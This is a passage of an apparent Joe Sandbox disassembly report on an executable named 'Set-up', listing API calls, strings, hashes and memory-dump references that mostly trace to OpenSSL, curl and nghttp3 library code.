                                      • Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37262
                                      • Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37285
                                      • Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372C5
                                      • Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpy$strcpystrlen
                                    • String ID: No password method specified$Prompt info data type incorrect$crypto/passphrase.c$do_ui_passphrase$info$ossl_pw_get_passphrase$pass phrase
                                    • API String ID: 699153967-1272933286
                                    • Opcode ID: 5fc53d74518b777e1aea8e82fe189b2a426944c8a36fcdd6f78c9c5704d78931
                                    • Instruction ID: 5e63ebc3fc565403b34b029283143f7fd7ea6d7abb3a2d7988926323cf66df66
                                    • Opcode Fuzzy Hash: 5fc53d74518b777e1aea8e82fe189b2a426944c8a36fcdd6f78c9c5704d78931
                                    • Instruction Fuzzy Hash: 99C108F4A84301BFD620BA61FC47F1B7AE8AB50B48F04682CF985762D3E6B1D8548653
                                    APIs
                                    • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00CE491A
                                    • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00CE497C
                                    • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00CE49F1
                                    • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00CE4ABB
                                    • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00CE4B21
                                    • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00CE4BCF
                                    • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00CE4C33
                                    • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00CE4CDD
                                    • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,?,0000000B), ref: 00CE4D30
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memchr
                                    • String ID: 0123456789
                                    • API String ID: 3297308162-2793719750
                                    • Opcode ID: 8106f3a6cfe71e42fb89b1a51da58b67f3b8923570c6135e45a74cbd16abd4ba
                                    • Instruction ID: 8a44d2823022716a3b861d92692a2f7433cc8a9ed7cf0c108a1e8275c5db0e55
                                    • Opcode Fuzzy Hash: 8106f3a6cfe71e42fb89b1a51da58b67f3b8923570c6135e45a74cbd16abd4ba
                                    • Instruction Fuzzy Hash: D0B166316483D15BDB2A8E2784A07B67BC99F62744F1D80ADDCE49B3C3D729CE0A9711
                                    APIs
                                      • Part of subcall function 00E5B4B0: GetEnvironmentVariableW.KERNEL32(OPENSSL_WIN32_UTF8,00000000,00000000,?,?,00000000,00000000,00000000,?,00E67667,OPENSSL_MODULES), ref: 00E5B4CA
                                      • Part of subcall function 00E5B4B0: GetACP.KERNEL32(?,?,00000000,00000000,00000000,?,00E67667,OPENSSL_MODULES), ref: 00E5B4D4
                                      • Part of subcall function 00E5B4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,00E67667,000000FF,00000000,00000000,?,?,00000000,00000000,00000000,?,00E67667,OPENSSL_MODULES), ref: 00E5B53B
                                      • Part of subcall function 00E5B4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,00E67667,000000FF,-00000008,00000000,?,?,?,00000000,00000000,00000000,?,00E67667,OPENSSL_MODULES), ref: 00E5B5A1
                                      • Part of subcall function 00E5B4B0: GetEnvironmentVariableW.KERNEL32(-00000008,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00E67667,OPENSSL_MODULES), ref: 00E5B5B4
                                      • Part of subcall function 00E5B4B0: GetEnvironmentVariableW.KERNEL32(?,-00000008,00000000,?,?,?,?,00000000,00000000,00000000,?,00E67667,OPENSSL_MODULES), ref: 00E5B648
                                      • Part of subcall function 00E5B4B0: WideCharToMultiByte.KERNEL32 ref: 00E5B67F
                                      • Part of subcall function 00E5B4B0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(00E67667,?,?,00000000,00000000,00000000,?,00E67667,OPENSSL_MODULES), ref: 00E5B504
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00DEA1F0
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00DEA20B
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000000,00000000), ref: 00DEA25D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiVariableWide$strlen$getenvmemcpy
                                    • String ID: %02x$OSSL_QFILTER$QLOGDIR$_%s.sqlog$client$server$ssl/quic/qlog.c
                                    • API String ID: 2744062652-2540125403
                                    • Opcode ID: e93ed872ee140f4427e305c3d10b2a91557c9f52a1811da7026887fb7f9a48a0
                                    • Instruction ID: e58bca2c97ef309a79811928f9c38f85f875df27f3ead10fac0c7007a4b1b610
                                    • Opcode Fuzzy Hash: e93ed872ee140f4427e305c3d10b2a91557c9f52a1811da7026887fb7f9a48a0
                                    • Instruction Fuzzy Hash: 0D51F4A1E043966FEB10766A9C42B3B76D99F90705F084438FD89A7343F675FD0486B2
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00CA284C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strlen
                                    • String ID: %s%s%s$Alt-svc connecting from [%s]%s:%d to [%s]%s:%d$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.$url.c
                                    • API String ID: 39653677-4104037097
                                    • Opcode ID: 518df8d524bc8f2d8a532105125523b4ec8444652112cfc952e985c81f0376ea
                                    • Instruction ID: 4b06ef68f7a0b9e371434196064f056c498d9d24b1f341b4817d891980cd0233
                                    • Opcode Fuzzy Hash: 518df8d524bc8f2d8a532105125523b4ec8444652112cfc952e985c81f0376ea
                                    • Instruction Fuzzy Hash: 9CA14870A043165FDB289E1CD845B7B7796AF9235CF08447DFCA94B292E7318E41E392
                                    APIs
                                    • getpeername.WS2_32(?,?,00000080), ref: 00CBA376
                                    • WSAGetLastError.WS2_32 ref: 00CBA380
                                      • Part of subcall function 00C878B0: closesocket.WS2_32(?), ref: 00C878BB
                                      • Part of subcall function 00CBEF30: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000001,?,?), ref: 00CBEF6F
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CBA3D2
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CBA3D6
                                    Strings
                                    • getpeername() failed with errno %d: %s, xrefs: 00CBA3A0
                                    • accepted_set(sock=%d, remote=%s port=%d), xrefs: 00CBA488
                                    • cf-socket.c, xrefs: 00CBA2E9
                                    • ssrem inet_ntop() failed with errno %d: %s, xrefs: 00CBA3F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _errno$ErrorLastclosesocketgetpeername
                                    • String ID: accepted_set(sock=%d, remote=%s port=%d)$cf-socket.c$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                    • API String ID: 1501154218-2965463112
                                    • Opcode ID: a7f061e208cf62c8e54a9dc1665cd9b28f960d2735d8620383504a656578168c
                                    • Instruction ID: f242d70911498d96caa2b037b898d308016baba3d538acf1c384d167204c9592
                                    • Opcode Fuzzy Hash: a7f061e208cf62c8e54a9dc1665cd9b28f960d2735d8620383504a656578168c
                                    • Instruction Fuzzy Hash: EF51F731904740ABEB259F24CC46FE677B8AF85314F044518FD9D57252EB32A989CB93
                                    APIs
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 00D2A5FC
                                    • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 00D2A698
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00D2A6BF
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i + 1 < blk->n,nghttp3_ksl.c,0000019B), ref: 00D2A6EB
                                    • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK,nghttp3_ksl.c,000001A2), ref: 00D2A700
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _assertmemcpy$memmove
                                    • String ID: i + 1 < blk->n$lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK$nghttp3_ksl.c
                                    • API String ID: 3463011695-2629231663
                                    • Opcode ID: fa03de5cac0315c69a792005708456c63785f0f092dae58d206a7b4ad3364371
                                    • Instruction ID: e7126a6929ab22c3d092b25815b93ae43aece5a7602efc72d6a41f32a8935822
                                    • Opcode Fuzzy Hash: fa03de5cac0315c69a792005708456c63785f0f092dae58d206a7b4ad3364371
                                    • Instruction Fuzzy Hash: 124173766043059FC708DF18D98186AB7EAFFA8718F08C96DE8898B345E771ED11CB61
                                    APIs
                                    • CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00EC2491
                                    • CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00EC24C6
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00EBF5B4), ref: 00EC2529
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: CertCertificateContextProperty$ErrorLast
                                    • String ID: %lX$ERR_CAPI_error$Error code= 0x$engines/e_capi.c$engines/e_capi_err.c
                                    • API String ID: 2217977984-837018288
                                    • Opcode ID: 99f06859189f69e6d32ad98c661b7ca734709dd5c468e9a34b0a8fd852cb9f08
                                    • Instruction ID: 0242bf3453d26a1a8b0b1ff7df2cf939940590e6d2305684552ba6b4b46e0804
                                    • Opcode Fuzzy Hash: 99f06859189f69e6d32ad98c661b7ca734709dd5c468e9a34b0a8fd852cb9f08
                                    • Instruction Fuzzy Hash: 0511EEA5B953087BF13032B27C07F2B7E4CDB41B49F142428FA0C781C7F99395198A62
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0100AB11
                                    • GetFileAttributesA.KERNEL32 ref: 0100AB30
                                    • _fullpath.MSVCRT ref: 0100AB5D
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0100AB65
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0100AB79
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0100AC48
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0100AC80
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0100AC90
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0100AC9F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: _errno$AttributesFile_fullpathmallocstrlen
                                    • String ID:
                                    • API String ID: 1976726163-0
                                    • Opcode ID: dc23eef72fcb057c8fe4614aa00629ef8f11a3ccfa351fb75ef8e67439820426
                                    • Instruction ID: 67866f09a22d6c5917978c8107bd90090b9ce56214a5ff9c8c3dcf3aa191494b
                                    • Opcode Fuzzy Hash: dc23eef72fcb057c8fe4614aa00629ef8f11a3ccfa351fb75ef8e67439820426
                                    • Instruction Fuzzy Hash: 8F412470604709CFF716EF29D4887AABBE1BF85300F18867AC9C88B2C1D7348545CB92
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CD2666
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CD2699
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00CD26FB
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 00CD273A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: strlen$_time64memcpy
                                    • String ID: :%u$Shuffling %i addresses$hostip.c
                                    • API String ID: 2198566249-1766712111
                                    • Opcode ID: da0c0026720d4df524fa47fbbefab9009a20533e373d6a480a7e01b98302a79e
                                    • Instruction ID: 9edbc0272551d3d703cf4935f3c8e5693af99407b0b819875d270f2eeec68c1f
                                    • Opcode Fuzzy Hash: da0c0026720d4df524fa47fbbefab9009a20533e373d6a480a7e01b98302a79e
                                    • Instruction Fuzzy Hash: E4A1E2756047009BD735DF19D885F6BB3E5EFA4304F19852EEE9987382E331EA118B81
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 010069F1
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000001,00000000,00000000,?,00000009,?), ref: 01006A11
                                    • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,000000FF,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 01006A53
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 01006AB6
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 01006AC7
                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 01006ADA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
